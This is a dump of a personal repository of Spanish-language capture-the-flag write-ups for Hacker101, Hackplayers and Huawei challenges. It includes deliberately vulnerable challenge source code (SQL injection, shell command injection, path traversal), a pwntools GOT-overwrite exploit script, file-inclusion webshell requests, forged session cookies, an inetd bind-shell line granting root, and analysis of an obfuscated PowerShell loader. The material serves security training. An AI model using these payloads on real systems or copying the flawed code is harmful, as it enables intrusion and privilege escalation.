Welcome to level 0. Enjoy your stay.
29 | 30 | 31 | ``` 32 | Accedemos a `background.png` y obtenemos la flag. 33 | -------------------------------------------------------------------------------- /hacker101/level06-blog.md: -------------------------------------------------------------------------------- 1 | # HackerOne Hacker101 CTF 2 | 3 | ## Cody's First Blog 4 | ### Web - Moderate (5/flag) 5 | 6 |  7 | 8 | ### Hints 9 | 10 | * Flag0 11 | * What was the first input you saw? 12 | * Figuring out what platform this is running on may give you some ideas 13 | * Code injection usually doesn't work 14 | * Flag1 15 | * Make sure you check everything you're provided 16 | * Unused code can often lead to information you wouldn't otherwise get 17 | * Simple guessing might help you out 18 | * Flag2 19 | * Read the first blog post carefully 20 | * We talk about this in the Hacker101 File Inclusion Bugs video 21 | * Where can you access your own stored data? 22 | * Include doesn't just work for filenames 23 | 24 | 25 | ### Flag0 - PHP 26 | 27 | La primera de las flags se obtiene intentando inyectar código PHP en un post. 28 | ``` 29 | 30 | ``` 31 | 32 | ### Flag1 - Guessing 33 | 34 | En el código fuente del index hay un comentario HTML con la siguiente URL 35 | 36 | ``` 37 | 38 | ``` 39 | 40 | Cuando accedemos a ella tenemos un formulario de login. Además el formato de la URL puede ser vulnerable a LFI. 41 | 42 | Probamos la siguiente página inexistente `/?page=TEST` y obtenemos un error en el que vemos que se le ha añadido la extensión *PHP*. 43 | 44 | `Warning: include(TEST.php): failed to open stream: No such file or directory in /app/index.php on line 21` 45 | 46 | En versiones antiguas de PHP es posible utilizar un byte nulo `%00` como terminador en la función `include`. Para verificar si funciona lo usamos con un archivo que sabemos que existe. 47 | 48 | `?page=admin.auth.inc.php%00` 49 | 50 | `Warning: include(): Failed opening 'admin.auth.inc.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in /app/index.php on line 21` 51 | 52 | Nos devuelve un error, por tanto no es vulnerable. 53 | 54 | Tras un poco de guessing, tal como nos indica la pista. Accedemos a `admin.inc.php`. 55 | 56 |  57 | 58 | ### Flag2 - SSRF + RCE 59 | 60 | El ultimo comando es conseguir ejecución de comandos en el servidor. 61 | 62 | El primer paso es publicar y aprobar un comentario con una webshell ``. 63 | 64 |  65 | 66 | El siguiente paso es cargar este código haciendo una petición HTTP al index, ademas e 67 | 68 | `?page=http://127.0.0.1?&cmd=whoami` 69 | 70 | Con `cat index.php` obtenemos el código fuente de la aplicación, y la última flag. 71 | 72 | ```php 73 | ^FLAG^5c9376d3de6ef5ba7b2af89f133b51a62f0911e6bd7f6bfd8a96cfd997ea2d55$FLAG$'; 85 | ?> 86 |Comment submitted and awaiting approval!
87 | Go back 88 | 96 | 97 | 98 | 99 |105 |
106 |
107 |
Comments
108 | 109 |Add comment:
110 | 114 | 118 |119 | 120 | 123 | 124 | 125 | ``` 126 | -------------------------------------------------------------------------------- /hacker101/level07-postbook.md: -------------------------------------------------------------------------------- 1 | # HackerOne Hacker101 CTF 2 | 3 | ## Postbook 4 | ### Web - Easy (4/flag) 5 | 6 |  7 | 8 | 9 | * Flag0 10 | * The person with username "user" has a very easy password... 11 | * Flag1 12 | * Try viewing your own post and then see if you can change the ID 13 | * Flag2 14 | * You should definitely use "Inspect Element" on the form when creating a new post 15 | * Flag3 16 | * 189 * 5 17 | * Flag4 18 | * You can edit your own posts, what about someone else's? 19 | * Flag5 20 | * The cookie allows you to stay signed in. Can you figure out how they work so you can sign in to user with ID 1? 21 | * Flag6 22 | * Deleting a post seems to take an ID that is not a number. Can you figure out what it is? 23 | 24 | 25 | 26 | ### Flag0 - Credenciales debiles 27 | La primera flag se obtiene al acceder con `user:password` 28 | 29 | ### Flag1 - Falta de autorización 30 | Accedemos a un post de otro usuario `/index.php?page=view.php&id=2` 31 | 32 | ### Flag2 - WTF!! 33 | Creamos un post con el ID de otro usuario que se envía como un parámetro oculto del formulario. 34 | 35 | ### Flag3 - Free points 36 | Visitamos el post 945 `/index.php?page=view.php&id=945` 37 | 38 | ### Flag4 - Falta de autorización 39 | Modificamos el post de otro usuario `/index.php?page=edit.php&id=1` 40 | 41 | ### Flag5 - Cookie predecible 42 | La cookie `c81e728d9d4c2f636f067f89cc14862c` corresponde al hash MD5 de '2', generamos el MD5 de '1' `c4ca4238a0b923820dcc509a6f75849b` y modificamos la cookie, de esta forma accedemos como el usuario admin 43 | ### Flag6 - ID predecible y falta de autorización 44 | Borramos el post de otro usuario, de la misma forma el ID del post es el hash MD5 de un valor numerico `index.php?page=delete.php&id=c81e728d9d4c2f636f067f89cc14862c`. 45 | -------------------------------------------------------------------------------- /hacker101/level08-ticketastic.md: -------------------------------------------------------------------------------- 1 | # HackerOne Hacker101 CTF 2 | 3 | ## Ticketastic 4 | ### Web - Moderate (5/flag) 5 | 6 |  7 | 8 | ### Hints 9 | * Flag0 10 | * This level and the Ticketastic demo instance are running the same code 11 | * Take a look at addUser on the demo instance 12 | * What is missing? 13 | * Humans might read these tickets and interact with them 14 | * Links in tickets could be interesting 15 | * Flag1 16 | * How do others log into this instance? 17 | * The login form reveals more than it should 18 | * So does the ticket endpoint 19 | 20 | 21 | Para este reto disponemos de una versión demo donde probar las diferentes vulnerabilidades antes de enfrentarnos a la versión "real" 22 | 23 | Una de las pistas la encontramos en el ticket de ejemplo. 24 | ``` 25 | Example Ticket 26 | This is your ordinary, run of the mill ticket. If any errors occurred during processing -- for instance, if the user gives a bad link -- these will be noted here. 27 | ``` 28 | 29 | La opción de crear usuarios consta de un formulario sin protección a CSRF que además envía los datos por el método GET `/newUser?username=patatas&password=fritas&password2=fritas`. 30 | 31 |  32 | 33 | 34 | Probamos a enviar un ticket con una URL, observamos como tarda mas tiempo de lo habitual en enviarse. 35 | 36 |  37 | 38 | En el panel de administración aparece el siguiente mensaje. 39 | 40 |  41 | 42 | Aunque este formulario también es vulnerable a XSS, al no haber un administrador que revise los posts no podemos usar esta vulnerabilidad. 43 | 44 | El visor de tickets `/ticket?id=1` también es vulnerable a inyección SQL en el parámetro *id*. Al igual que en anteriores retos, se nos muestra parte del código fuente cuando ocurre un error. 45 | 46 | ```python 47 | cur.execute('SELECT title, body, reply FROM tickets WHERE id=%s' % request.args['id']) 48 | title, body, reply = cur.fetchone() 49 | ``` 50 | 51 | Utilizamos *SQLmap* para extraer los datos de la base de datos 52 | ``` 53 | Table: users 54 | +----+----------+----------+ 55 | | id | username | password | 56 | +----+----------+----------+ 57 | | 1 | admin | admin | 58 | +----+----------+----------+ 59 | 60 | Table: tickets 61 | +----+--------------------------------------+---------+----------------+ 62 | | id | body | reply | title | 63 | +----+--------------------------------------+---------+----------------+ 64 | | 1 | This is your ordinary, run of the... |
Magical Image Gallery
14 | $ALBUMS$ 15 | 16 | 17 | ''' 18 | 19 | viewAlbum = ''' 20 | 21 | 22 | 23 |$TITLE$
27 | $GALLERY$ 28 | 29 | 30 | ''' 31 | 32 | def getDb(): 33 | return MySQLdb.connect(host="localhost", user="root", password="", db="level5") 34 | 35 | def sanitize(data): 36 | return data.replace('&', '&').replace('<', '<').replace('>', '>').replace('"', '"') 37 | 38 | @app.route('/') 39 | def index(): 40 | cur = getDb().cursor() 41 | cur.execute('SELECT id, title FROM albums') 42 | albums = list(cur.fetchall()) 43 | 44 | rep = '' 45 | for id, title in albums: 46 | rep += '%s
\n' % sanitize(title) 47 | rep += ''
48 | cur.execute('SELECT id, title, filename FROM photos WHERE parent=%s LIMIT 3', (id, ))
49 | fns = []
50 | for pid, ptitle, pfn in cur.fetchall():
51 | rep += '
%s' % (pid, sanitize(ptitle))
52 | fns.append(pfn)
53 | rep += 'Space used: ' + subprocess.check_output('du -ch %s || exit 0' % ' '.join('files/' + fn for fn in fns), shell=True, stderr=subprocess.STDOUT).strip().rsplit('\n', 1)[-1] + ''
54 | rep += '
\n'
55 |
56 | return home.replace('$ALBUMS$', rep)
57 |
58 | @app.route('/fetch')
59 | def fetch():
60 | cur = getDb().cursor()
61 | if cur.execute('SELECT filename FROM photos WHERE id=%s' % request.args['id']) == 0:
62 | abort(404)
63 |
64 | # It's dangerous to go alone, take this:
65 | # ^FLAG^a4482735c6a1bd68b3a6edec1c0ca3c5333187f5eb82f95501f57ff141b5f39d$FLAG$
66 |
67 | return file('./%s' % cur.fetchone()[0].replace('..', ''), 'rb').read()
68 |
69 | if __name__ == "__main__":
70 | app.run(host='0.0.0.0', port=80)
--------------------------------------------------------------------------------
/hacker101/sources/level06-blog/000-default.conf:
--------------------------------------------------------------------------------
1 | %s
Pending Comments
2 | 8 |9 |
Comment on
10 | 11 | ">Approve Comment 12 | -------------------------------------------------------------------------------- /hacker101/sources/level06-blog/index.php: -------------------------------------------------------------------------------- 1 | ^FLAG^5c9376d3de6ef5ba7b2af89f133b51a62f0911e6bd7f6bfd8a96cfd997ea2d55$FLAG$'; 13 | ?> 14 |Comment submitted and awaiting approval!
15 | Go back 16 | 24 | 25 | 26 | 27 |33 |
34 |
35 |
Comments
36 | 37 |Add comment:
38 | 42 | 46 |47 | 48 | 51 | 52 | -------------------------------------------------------------------------------- /hacker101/sources/level06-blog/setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | set -e 3 | 4 | chgrp -R mysql /var/lib/mysql 5 | service mysql start & 6 | python setup.py 7 | rm setup.py 8 | export FLAGS='[]' 9 | 10 | /usr/sbin/apache2ctl -D FOREGROUND -------------------------------------------------------------------------------- /hackplayers-2018/cisco/img/cisco-b374k.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/cisco/img/cisco-b374k.png -------------------------------------------------------------------------------- /hackplayers-2018/cisco/img/cisco-cadaver.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/cisco/img/cisco-cadaver.png -------------------------------------------------------------------------------- /hackplayers-2018/cisco/img/cisco-ssh.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/cisco/img/cisco-ssh.png -------------------------------------------------------------------------------- /hackplayers-2018/cisco/img/cisco-web1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/cisco/img/cisco-web1.png -------------------------------------------------------------------------------- /hackplayers-2018/cisco/img/cisco-web2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/cisco/img/cisco-web2.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-browserexploit.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-browserexploit.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-dhcpv6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-dhcpv6.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-elevate.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-elevate.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-firefox.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-firefox.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-nmap2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-nmap2.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-responder-hash.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-responder-hash.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-responder1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-responder1.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-winexe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-winexe.png -------------------------------------------------------------------------------- /hackplayers-2018/jax/img/jax-wireshark-cepheus.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/jax/img/jax-wireshark-cepheus.png -------------------------------------------------------------------------------- /hackplayers-2018/josie/img/josie-hnb.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/josie/img/josie-hnb.png -------------------------------------------------------------------------------- /hackplayers-2018/josie/img/josie-upload.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/josie/img/josie-upload.png -------------------------------------------------------------------------------- /hackplayers-2018/josie/img/josie-web1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/josie/img/josie-web1.png -------------------------------------------------------------------------------- /hackplayers-2018/sammy/README.md: -------------------------------------------------------------------------------- 1 | # CTF Hackplayers 2018 - Sammy 2 | 3 | Maquina ‘Sammy’ 10.42.0.153 4 | 5 | ```bash 6 | $ nmap -sV 10.42.0.153 7 | PORT STATE SERVICE VERSION 8 | 22/tcp open ssh OpenSSH 6.6.1_hpn13v11 (FreeBSD 20140420; protocol 2.0) 9 | 80/tcp open http Apache httpd 2.4.18 ((FreeBSD) PHP/5.6.19) 10 | 3306/tcp open mysql MySQL (unauthorized) 11 | ``` 12 | 13 | El servicio http aloja una aplicación wordpress. En la página de contacto se encuentra un file uploader que podemos utilizar para subir una webshell. 14 | 15 | Esta webshell se almacena en el directorio */wp-content/uploads/*. 16 | 17 |  18 | 19 | Una vez tenemos acceso al servidor, vemos que existe un usuario bob. Por lo que probamos a acceder con la contraseña *KsupesLd819/* conseguida anteriormente en la máquina Cisco. 20 | 21 | Si utilizamos `sudo -l` podemos ver como el usuario *bob* tiene permisos para reiniciar la maquina. Por lo que sospechamos que la elevación podría hacerse modificando algunos de los servicios que arrancan al iniciar la máquina. 22 | 23 | En este caso el servicio vulnerable es *inetd*, ya que los permisos del archivo */etc/inetd.conf* nos permiten modificarlo. 24 | 25 | Modificamos el archivo de configuración *inetd.conf* para montar una bind shell en el puerto 21 correspondiente al servicio ftp. 26 | 27 | ``` 28 | ftp stream tcp nowait root /bin/sh -i 29 | ``` 30 | 31 | Después de modificar la configuración, reiniciamos la maquina, ya que es la única forma que tenemos de reiniciar el servicio con la nueva configuración. 32 | 33 | ```bash 34 | $ sudo reboot 35 | ``` 36 | 37 | Una vez reiniciada la máquina, nos conectamos al puerto 21 y obtenemos una shell con el usuario root. 38 | 39 |  40 | -------------------------------------------------------------------------------- /hackplayers-2018/sammy/img/sammy-root.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/sammy/img/sammy-root.png -------------------------------------------------------------------------------- /hackplayers-2018/sammy/img/sammy-shell.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/hackplayers-2018/sammy/img/sammy-shell.png -------------------------------------------------------------------------------- /hackplayers-2020/dream-agenda/README.md: -------------------------------------------------------------------------------- 1 | # Hackplayers H-c0n Quals 2020 - Dream Agenda - Exploiting - 332 Points 2 | 3 | Aprovechamos una vulnerabilidad en la aplicación que nos permite introducir números negativos. 4 | 5 | Obtenemos de la GOT la dirección de *puts* en la libc. Utilizando una base de datos de versiones de libc encontramos que versión se utiliza en el sistema objetivo. 6 | 7 | ``` 8 | ./find puts 0x7f8763787690 9 | ubuntu-xenial-amd64-libc6 (id libc6_2.23-0ubuntu10_amd64) 10 | archive-glibc (id libc6_2.23-0ubuntu11_amd64) 11 | ``` 12 | 13 | Obtenemos las direcciones de memoria en la libc de las funciones *atoi* y *system*, y calculamos el offset entre ambas. 14 | 15 | ``` 16 | ./dump libc6_2.23-0ubuntu11_amd64 atoi 17 | offset_atoi = 0x0000000000036e80 18 | 19 | ./dump libc6_2.23-0ubuntu11_amd64 system 20 | offset_system = 0x0000000000045390 21 | ``` 22 | 23 | `offset_atoi_system = 0xe510` 24 | 25 | Modificamos en la tabla GOT la dirección a la que apunta la función *atoi* para que apunte a *system*. 26 | 27 | [solve.py](solve.py) 28 | -------------------------------------------------------------------------------- /hackplayers-2020/dream-agenda/solve.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python2 2 | 3 | import sys 4 | from pwn import * 5 | 6 | def get_number(i): 7 | p.sendline('4') 8 | s = p.recv() 9 | p.sendline('%d' % int(i)) 10 | num = p.recvline() 11 | p.recvuntil('>> ') 12 | if 'Cannot show that number!' in num: 13 | return -1 14 | elif 'Number:' in num: 15 | return int(num.split(':')[1].strip()) 16 | 17 | def edit_number(i, num): 18 | p.sendline('2') 19 | s = p.recv() 20 | p.sendline('%d' % int(i)) 21 | res = p.recv() 22 | if 'Cannot edit that number!' in res: 23 | return 0 24 | p.sendline('%d' % int(num)) 25 | res = p.recvline() 26 | p.recvuntil('>> ') 27 | if 'Number edited succesfully' in res: 28 | return 1 29 | return 0 30 | 31 | 32 | elf = ELF('./dream_agenda') 33 | 34 | if sys.argv[1]=='local': 35 | p = process('./dream_agenda') 36 | libc = ELF('./libc-local.so.6') 37 | system_offset = libc.symbols['system'] - libc.symbols['atoi'] 38 | elif sys.argv[1]=='remote': 39 | p = remote('ctf.h-c0n.com', 60001) 40 | system_offset = 0xe510 # libc6_2.23-0ubuntu11_amd64 41 | else: 42 | exit() 43 | 44 | atoi = elf.got['atoi'] 45 | numbers = elf.symbols['numbers'] 46 | 47 | log.info("atoi: " + hex(atoi)) 48 | log.info("number[]: " + hex(numbers)) 49 | 50 | s = p.recvuntil('>> ') 51 | 52 | ATOI = get_number((atoi - numbers)/8) 53 | log.info("ATOI address: " + hex(ATOI)) 54 | 55 | SYSTEM = ATOI + system_offset 56 | edit_number((atoi - numbers)/8, SYSTEM) 57 | 58 | p.sendline('/bin/sh') 59 | p.sendline('ls -l flag') 60 | print(p.recv()) 61 | p.sendline('cat flag') 62 | print(p.recv()) 63 | 64 | p.close() 65 | -------------------------------------------------------------------------------- /hackplayers-2020/kojo-no-mai/README.md: -------------------------------------------------------------------------------- 1 | # Hackplayers H-c0n Quals 2020 - Kojo No Mai - Crypto - 200 Points 2 | 3 | Como ennciado del reto tenemos una clave pública de RSA y textos cifrados y codificados en base64. 4 | 5 | ``` 6 | -----BEGIN PUBLIC KEY----- 7 | MCwwDQYJKoZIhvcNAQEBBQADGwAwGAIRAOSpZLB7VXE7iZA72YTS85UCAwEAAQ== 8 | -----END PUBLIC KEY----- 9 | 10 | XnZvSmNqZqz+N5LL+ec6XA== 11 | k4TD9AHouSlxdn97PXfmOg== 12 | FhHp7W1orCt78mlz5PNGBQ== 13 | a5FPpzeDX29qOriH2kS64A== 14 | XCWOYhWFC6v3wa3qM58v5g== 15 | qlLYhsaMWbOvCXddqsQ/pA== 16 | i1jClSfyTf8XLiT57Su6IQ== 17 | DZbTy4vMKW0WqjrD7CspMg== 18 | ``` 19 | 20 | Con *openssl* obtenemos los parámetros de la clave privada RSA. 21 | 22 | ```bash 23 | openssl rsa -in pub -pubin -text -noout 24 | 25 | RSA Public-Key: (128 bit) 26 | Modulus: 27 | 00:e4:a9:64:b0:7b:55:71:3b:89:90:3b:d9:84:d2: 28 | f3:95 29 | Exponent: 65537 (0x10001) 30 | ``` 31 | 32 | `n = 0x00e4a964b07b55713b89903bd984d2f395 = 303943523431340122197231114949456229269` 33 | 34 | Factorizamos este número, en este caso utilizamos
21 |
31 |
32 |
56 |
57 |
58 |
59 |
60 |
--------------------------------------------------------------------------------
/huawei-2018/02-paranormalglitch/README.md:
--------------------------------------------------------------------------------
1 | # Huawei CTF 2018 - Reto 2 - PARANORMALGLITCH
2 | ### Categoría: Forense
3 |
4 | El reto consiste en encontrar la flag en una imagen JPG. Por comodidad usaremos `gatos.jpg` como nombre del archivo a analizar.
5 |
6 | 
7 |
8 | El archivo tiene un tamaño de `670081 bytes`.
9 |
10 | ```bash
11 | file gatos.jpg
12 | gatos.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, progressive, precision 8, 1920x1024, frames 3
13 | ```
14 |
15 | Usamos algunas herramientas de busqueda de firmas como son *binwalk*, *photorec* o *foremost*.
16 |
17 | En el caso de *foremost* obtenemos la misma imagen JPG, pero con un tamaño de `196951 bytes`. Esto nos hace sospechar que hay otro archivo o datos importantes después de la imagen JPG.
18 |
19 | Extraemos los datos a partir del offset 196951
20 |
21 | ```bash
22 | dd if=gatos.jpg of=part2 bs=1 skip=196951
23 | ```
24 |
25 | Analizamos este nuevo archivo `part2`. Rápidamente observamos la existencia de los strings *IHDR* y *IDAT*, por lo que posiblemente nos encontramos con una imagen PNG.
26 |
27 | ```
28 | xxd part2 |head
29 | 00000000: 0d0a 1a0a 0000 000d 4948 4452 0000 0400 ........IHDR....
30 | 00000010: 0000 0288 0806 0000 00ee 2e88 0c00 0000 ................
31 | 00000020: 0662 4b47 4400 ff00 ff00 ffa0 bda7 9300 .bKGD...........
32 | 00000030: 0020 0049 4441 5478 daec dde9 93a4 5776 . .IDATx......Wv
33 | 00000040: dff7 efbd f759 72ab acbd 7a43 3730 0007 .....Yr...zC70..
34 | 00000050: 98c1 7048 0ec5 4594 4c29 4221 4b61 5bf2 ..pH..E.L)B!Ka[.
35 | 00000060: a208 ff3d e2df e1b0 432f 1cb2 23ec b06c ...=....C/..#..l
36 | 00000070: 5914 456d 2629 919c 2139 43ce 7008 6200 Y.Em&)..!9C.p.b.
37 | 00000080: 34d0 68f4 5a5d 5d6b aecf 72ef f58b 2733 4.h.Z]]k..r...'3
38 | 00000090: 2bbb d0d5 682c 33e8 46ff 3e98 8cca caaa +...h,3.F.>.....
39 | ```
40 |
41 | Comparamos este inicio del archivo con otro archivo PNG o con el ejemplo que aparece en Wikipedia.
42 |
43 | 
44 |
45 | Vemos como nos faltan los 4 primeros bytes de la cabecera PNG (por este motivo los programas de recuperación de datos no identifican el archivo PNG).
46 | Los añadimos con *xxd* y *cat*.
47 |
48 | ```bash
49 | echo 89504e47 | xxd -ps -r > pngheader
50 | cat pngheader part2 > image.png
51 | ```
52 |
53 | Esta imagen no esta 100% correcta y no se abre con todos los softwares, aun así es posible visualizarla con *GIMP* y obtener la flag.
54 |
55 | 
--------------------------------------------------------------------------------
/huawei-2018/02-paranormalglitch/img/gatos-flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/02-paranormalglitch/img/gatos-flag.png
--------------------------------------------------------------------------------
/huawei-2018/02-paranormalglitch/img/gatos.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/02-paranormalglitch/img/gatos.png
--------------------------------------------------------------------------------
/huawei-2018/02-paranormalglitch/img/png-hex.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/02-paranormalglitch/img/png-hex.png
--------------------------------------------------------------------------------
/huawei-2018/03-backdoors_01/README.md:
--------------------------------------------------------------------------------
1 | # Huawei CTF 2018 - Reto 3 - BACKD00RS_01
2 | ### Categoría: Forense
3 |
4 | Estos retos se basan en analizar una Maquina Virtual infectada que utiliza el sistema operativo Ubuntu 16.04.
5 |
6 | Una vez accedemos con el usuario `ctf`, utilizamos el comando `su` para acceder como administradores de la maquina y analizarla mas exhaustivamente.
7 |
8 | En un primer momento obtenemos un mensaje de error, que nos indica que hay algo troyanizado.
9 |
10 | 
11 |
12 | Al final del archivo `.bashrc` tenemos un ejecutable, con un intento de ocultación después de muchos saltos de linea.
13 |
14 | ```
15 | /bin/sh311.x
16 | ```
17 |
18 | Analizamos este binario y con `ltrace` observamos como genera el string de la flag.
19 |
20 | 
--------------------------------------------------------------------------------
/huawei-2018/03-backdoors_01/img/vm-error.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/03-backdoors_01/img/vm-error.png
--------------------------------------------------------------------------------
/huawei-2018/03-backdoors_01/img/vm-flag.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/03-backdoors_01/img/vm-flag.png
--------------------------------------------------------------------------------
/huawei-2018/04-backdoors_02/README.md:
--------------------------------------------------------------------------------
1 | # Huawei CTF 2018 - Reto 4 - BACKD00RS_02
2 | ### Categoría: Forense
3 |
4 | El segundo backdoor se encuentra al utilizar `ps` para ver los procesos en ejecución.
5 |
6 | 
7 |
8 | El binario infectado es `/bin/ls`
9 |
10 | 
11 |
12 | Analizamos el binario ```/usr/sbin/psl``` y con `strings` obtenemos un texto en base64.
13 |
14 | ```
15 | Watch this: dV9SVAETWkATdX9ydEgDCwQAVQZSCgsFClBVVgJSBQNQVwACAlcDV1cAB1IBCk45Cg==
16 | ```
17 |
18 | Con *Auto Solver* de las PatataUtils *desciframos* el contenido del base64 y obtenemos la flag.
19 |
20 | De la forma complicada, el texto hay que descifrarlo/decodificarlo con XOR *0x33*.
21 |
22 | 
23 |
--------------------------------------------------------------------------------
/huawei-2018/04-backdoors_02/img/vm-autosolver.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/04-backdoors_02/img/vm-autosolver.png
--------------------------------------------------------------------------------
/huawei-2018/04-backdoors_02/img/vm-ls.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/04-backdoors_02/img/vm-ls.png
--------------------------------------------------------------------------------
/huawei-2018/04-backdoors_02/img/vm-ps.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/04-backdoors_02/img/vm-ps.png
--------------------------------------------------------------------------------
/huawei-2018/05-cybercrime101/README.md:
--------------------------------------------------------------------------------
1 | # Huawei CTF 2018 - Reto 5 - CYBERCRIME101
2 | ### Categoría: Forense
3 |
4 | En este reto nos piden analizar el malware `do_not_remove.bat` para encontrar la flag.
5 |
6 | En un primer analisis descubrimos que se trata de un script de powershell que ejecuta algo que esta codificado en Base64.
7 |
8 | ```powershell
9 | Invoke-Expression $(New-Object IO.StreamReader (
10 | $(New-Object IO.Compression.DeflateStream (
11 | $(New-Object IO.MemoryStream (,
12 | $([Convert]::FromBase64String("...")))),
13 | [IO.Compression.CompressionMode]::Decompress)),
14 | [Text.Encoding]::ASCII)).ReadToEnd();
15 | ```
16 |
17 | Decodificamos el texto en base64 y obtenemos algo binario, si nos fijamos en el código vemos como el siguiente paso es user la función `CompressionDeflateStream`.
18 |
19 | ```bash
20 | base64 -d b64.txt > bin
21 | printf "\x1f\x8b\x08\x00\x00\x00\x00\x00\x00\x00" |cat - bin |gzip -dc > code
22 | ```
23 |
24 | 
25 |
26 | Los mas sospechoso de este código es la la cadena hexadecimal que se envía en el User-Agent. Tras unas cuanto intentos de decodificarla, se llega a la conclusión de que se trata de otro gzip al comenzar con los bytes `1f 8b 08 00`.
27 |
28 | ```bash
29 | echo 1f8b08004b17425b0003f32f4ab70acd4d2a4acdc949b456f0c82f2eb10a700cb756082d4e2db24ac9cf4dcccc4b4cc9cdccb35670cb494cb772f37174af4e4e4a4b3233374b4d4c363632304f364849324d31324f33b54c35354e333432ab05006811b54b55000000 |xxd -ps -r |gzip -dc
30 | Org:Umbrella; Host:PAW; User:domainadmin; Flag:FLAG{cbfb676eac3207c0db5d27f59e53f126}
31 | ```
--------------------------------------------------------------------------------
/huawei-2018/05-cybercrime101/img/malwarecode.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/05-cybercrime101/img/malwarecode.png
--------------------------------------------------------------------------------
/huawei-2018/06-armoured-kitten/img/angr-solve.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/jesux/ctf-write-ups/d88e6dc0f6dcf009e897b3ee3eb833398da4e7a6/huawei-2018/06-armoured-kitten/img/angr-solve.png
--------------------------------------------------------------------------------
/huawei-2018/06-armoured-kitten/img/flag.png:
--------------------------------------------------------------------------------
